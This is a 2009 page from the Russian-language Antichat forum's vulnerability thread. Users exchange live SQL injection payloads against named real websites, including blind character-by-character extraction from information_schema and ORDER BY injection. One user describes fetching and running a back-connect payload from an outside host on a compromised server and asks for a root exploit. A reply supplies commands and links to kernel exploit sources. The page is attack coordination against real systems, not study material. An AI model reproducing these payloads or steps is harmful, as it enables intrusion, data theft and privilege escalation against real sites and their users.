ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
 
Страница 911 из 1393 « Первая < 411811861901 907 908 909 910 911 912 913 914 915 9219611011 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #9101  
Старый 26.09.2009, 14:22
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию
С запятыми не пашет вроде

http://lineager.ru/lwdb/index.php?part=items&id=1+and+ascii(substring((sel ect+table_name+from+information_schema.tables+limi t+1+offset+1)+from+1+for+1))>1
 

  #9102  
Старый 26.09.2009, 14:23
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию
http://lineager.ru/lwdb/index.php?part=items&id=1+and+5=@@version--

ЫЫ
 

  #9103  
Старый 26.09.2009, 15:16
Shadrin
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171

Репутация: 270
Отправить сообщение для Shadrin с помощью ICQ
По умолчанию
Цитата:
Сообщение от mailbrush  
Если в .htaccess на все файлы стоит Forbidden, то никак.
нет отдает 404 на файлы.
--
у меня вопрос нужно запретить запуск пхп скрптов,в папке,можно сделать это через htaccess?спасибо!
-уже нашел)
Код:
RemoveHandler .php .phtml .php3
AddType application/x-httpd-php-source .php .phtml .php3
Последний раз редактировалось Shadrin; 26.09.2009 в 15:24..
 

  #9104  
Старый 26.09.2009, 15:22
BlackSun
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию
Цитата:
Сообщение от mailbrush  
Если в .htaccess на все файлы стоит Forbidden, то никак.

Есть вопрос по руту сервака. Делаю back-коннект к себе. Комманды:

Код:
cd /tmp
wget http://evilcode.hmarka.net/2.tgz
gcc run.c -O run
./run
padlina z lublina! //это выводит после запуска
id
Код:
uid=48(apache) gid=48(apache) groups=48(apache),503(nismo),504(shopua@rambler.ru),505(shopua555),506(kamar),507(geniewgen)
Т.е. сервак не порутался... Как его порутать? Есть ли сплоит какой?

Код:
Linux shopua.com.ua 2.6.26.8-57.fc8 #1 SMP Thu Dec 18 19:19:45 EST 2008 i686 athlon i386 GNU/Linux
chmod 777 exploit.so;./exploit.so
ибо в твоем случае через пулсаудио файл не запустился.

--------------------------
http://fsb-my.name/c/exploit.c
http://fsb-my.name/c/pwnkernel.c
http://fsb-my.name/c/run.sh
 

  #9105  
Старый 26.09.2009, 15:54
wolmer
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
Провел на форуме:
4761503

Репутация: 229
По умолчанию
takenoprisoners.tk/index.php?site=awards&action=showsquad&squadID=1&p age=1{SQL-INJ}

Можно ли раскрутить? Если да то как? А то никак не пойму как крутить такую скулю крутить
 

  #9106  
Старый 26.09.2009, 16:05
LzD
Banned
Регистрация: 24.07.2009
Сообщений: 85
Провел на форуме:
229533

Репутация: 43
По умолчанию
Цитата:
Сообщение от wolmer  
takenoprisoners.tk/index.php?site=awards&action=showsquad&squadID=1&p age=1{SQL-INJ}

Можно ли раскрутить? Если да то как? А то никак не пойму как крутить такую скулю крутить
фак читай от джока
 

  #9107  
Старый 26.09.2009, 16:11
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию
Цитата:
Сообщение от wolmer  
takenoprisoners.tk/index.php?site=awards&action=showsquad&squadID=1&p age=1{SQL-INJ}

Можно ли раскрутить? Если да то как? А то никак не пойму как крутить такую скулю крутить
Инъекция в ORDER BY.

Цитата:
Сообщение от BlachSun  
chmod 777 exploit.so;./exploit.so
ибо в твоем случае через пулсаудио файл не запустился.

--------------------------
http://fsb-my.name/c/exploit.c
http://fsb-my.name/c/pwnkernel.c
http://fsb-my.name/c/run.sh
Эм... Что за exploit.so и где его взять? Он в результате запуска этого эксплоита должен создаться? И что за пулсаудио (гугл говорит, что голосвая система, но это бред=\ )?
 

  #9108  
Старый 26.09.2009, 16:14
S00pY
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544

Репутация: 412
Отправить сообщение для S00pY с помощью ICQ
Unhappy
Цитата:
Сообщение от z00MAN  
нет, просто ошибка базы.
ничего внедрить нельзя
ошибка базы ? (
Это иньект в ордере ... только толку от него



Соре mailbrush опередил
Последний раз редактировалось S00pY; 26.09.2009 в 16:15.. Причина: mailbrush опередил
 

  #9109  
Старый 26.09.2009, 16:39
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию
Цитата:
С запятыми не пашет вроде

http://lineager.ru/lwdb/index.php?part=items&id=1+and+ascii(substring((sel ect+table_name+from+i nformation_schema.tables+limit+1+offset+1)+from+1+ for+1))>1
а как в таком случае правильно выводить данные ? т.е. как мне узнать какому символу соответсвует запрос ?
 

  #9110  
Старый 26.09.2009, 16:57
S00pY
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544

Репутация: 412
Отправить сообщение для S00pY с помощью ICQ
По умолчанию
По логике < >,а потом сравнением и смотрим по ascii табле символ
forum.antichat.ru/thread119047.html
 
 
Страница 911 из 1393 « Первая < 411811861901 907 908 909 910 911 912 913 914 915 9219611011 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ